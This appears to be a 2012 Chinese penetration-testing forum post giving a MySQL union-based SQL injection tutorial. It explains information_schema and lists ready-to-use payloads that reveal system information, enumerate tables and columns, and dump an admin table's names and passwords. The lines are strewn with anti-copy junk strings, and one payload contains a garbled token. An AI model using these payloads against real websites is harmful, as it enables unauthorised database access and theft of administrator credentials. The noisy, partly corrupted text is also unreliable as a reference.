中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
# f& S4 c4 B- Y* \% r- ~3 {& y+ A# X4 `5 f8 Q! o$ Y
学习盲注前先了解下 IFORMATION_SCHEMA 库
9 ^; F& G# H& e( e% r- g% [+ r# k' v# Y% W9 C
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
  v' D( C! F2 N& p8 K4 a存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
" f. q9 [# H% K) b* e, n1.得到所有数据库名:& O. e# s0 V( ?
|SCHEMATA ->存储数据库名的表6 u7 [- `( o; @; l/ ^1 u  O( U* w
|---字段:SCHEMA_NAME ->数据库名称
) R; l( m$ b5 O& B0 p0 W$ k8 O, |8 l* u
|TABLES ->存储表名9 O& P% S( n% P
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名) o: J4 f0 j# B0 b- y
|---字段:TABLE_NAME ->存储表的表名
6 |8 f. E. J1 J% S* D4 S7 h
( {3 j8 |# [$ \( Z, A|COLUMNS ->存储的字段名表
6 o, I5 t9 }1 t; ]|---字段:TABLE_SCHEMA ->该字段所属数据库名
" j2 l# x$ l; }% s6 R( T|---字段:TABLE_NAME ->存储所属表的名称
0 F  Q- X8 u2 L2 y- M; O. g- r$ R: f! B& h  }+ r8 f$ @
|---字段:COLUMN_NAME ->该字段的名称: `8 j. ^* e) O+ d) M/ |& [

; B; w; I( W. ~- Z- r
3 L8 f( G& N8 ], i( ~$ I) h' G: b5 Y& Q, d, W8 c: j
###########################################################################: J) i' h  @# N4 G7 Q& R

; R5 b/ c1 x" t1 s: {0x001 获取系统信息:) d4 z4 W; L' K2 i" V: n

" A1 e) {. ]* Q% ]+ y  Punion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
, M$ d; s9 ]" }3 m7 I1 V# K' `' f: G- J6 ~4 g/ O( r7 N: u
/*1 F9 P' G. H, ^1 o- A( I

; v7 ?7 F8 f, K6 p" b@@global.version_compile_os 获取系统版本% Y3 w! m: E8 H6 L( n

9 o" G* X* X" r+ E@@datadir 数据库路径
6 w* S8 `: g7 Z8 A& Kdatabase() 当前数据库名称
1 O  b9 H. Z" y3 h) j0x3c62723e 换行HEX值. U- b% _1 k+ R7 ^0 B% I& g

5 ^) ]$ k8 `0 ]/ n3 z- ^% q' s*/6 L0 a5 j8 J( Y, a/ O5 i# l$ v- D# {
- {/ i4 ]5 H  c" \
! n0 ?: F+ ^* g. L  W& V/ w
- }4 H( Y: M  c1 H6 F; W0 A1 g# d
######################################################################2 P6 B  z+ n+ t0 e
0 B; S7 D2 g( M  Y5 {" I3 a
0x002 获取表名
; y* t) C- K& A9 h( m! y: m1 T- E# W2 c7 \- P2 B
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*2 u. ~: Z3 o5 U# }9 w

3 G% r4 _* ~* z; N, W, p
# b/ G6 P% i7 \. k  O3 U, B2 u( r$ D" i  b3 e4 T6 ]7 D$ m  K" U9 {3 `
/*- |! a. [- N) A7 H
8 V. B) m. L" U) M5 {' O
0x67617264656e 为当前数据库名
. G% G. q2 z2 |( z& d# {  @) b; a6 d8 ]( Q2 F+ _6 C
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名% [( q; l8 @. ?0 h% k2 s# k: E9 d

0 n) |" l8 w8 f+ |9 ^*/8 A8 P( U& _) C- g* U2 i

+ \/ V6 t7 K; L8 y9 q1 ~######################################################################
) C2 i3 R$ h" [8 b* v( `* h; \7 ^) k3 s
. t, s  q: k5 e

% N7 G) V! y# H  b9 |( V9 Y0x003 获取字段! ^: w& y, |/ t4 h

3 m& E2 P+ U/ W; H6 }2 Q9 dunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*0 `9 D6 b; n- V$ I# ]

" y4 O& `' [3 a/*
" }% n* c6 v' G8 t6 u# E8 _/ }
5 N; n- H- l6 A: O2 A0 o+ ~2 Ogroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段$ ^. S! O8 r9 q3 f' G

7 f0 Q" J7 N$ ]% u9 ]! x0x61646d696e ->选择一个表
. ~3 k9 h+ L! N  v4 n; ~
  W9 [8 A+ G- ~# K$ j- Y0x67617264656e ->数据库名
. z% C2 w5 x) a- b" y: ?9 O  `/ ?+ k" {
  P6 Y6 i6 u/ V7 _5 l*/
" w1 a5 [5 l$ e5 e0 J5 v
8 \8 D" G& t' S/ A1 c2 I; A2 u" G8 N#####################################################################
6 s9 h- W, G9 R4 U4 g
. {1 r' c% \8 u: a9 U: f9 Y & e8 w0 q0 t: L/ T0 A. @; _" H

3 R2 o) r& s7 J" `0x004 获取数据
1 r6 @; I6 {! B* R5 ^; s3 N$ o/ p' k2 ]  k+ m( H% K7 ?0 D* f: S
union select 1,2,3
8 W' \. i7 Y0 X$ Z  b,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin8 E0 G, m. Z0 l" _

* ^, i# p* ]* Z. Z. x; Yunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin2 d! h4 D4 o. t8 P

% A- o$ Z3 b. p1 c4 _4 W2 x
8 E0 [# k. w2 r' {
" Q9 u, m9 G# e& F4 |3 C/*: \' n+ D1 I* m5 x( T
2 F% s3 e# |3 e7 i
0x3c62723e 换行符号HEX编码
( o, b- O4 n! ^: Z$ c! {9 _& [1 V
: H8 D3 y" X" \1 ?group_concat 同时获得该字段所有数据
* W* N! S1 V3 H0 L3 S7 L8 \$ g2 M8 R6 ]8 w5 X% v
*/0 T7 n# L8 d0 q: V& k

7 C. |! @: N" ?2 H4 |( V7 U




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2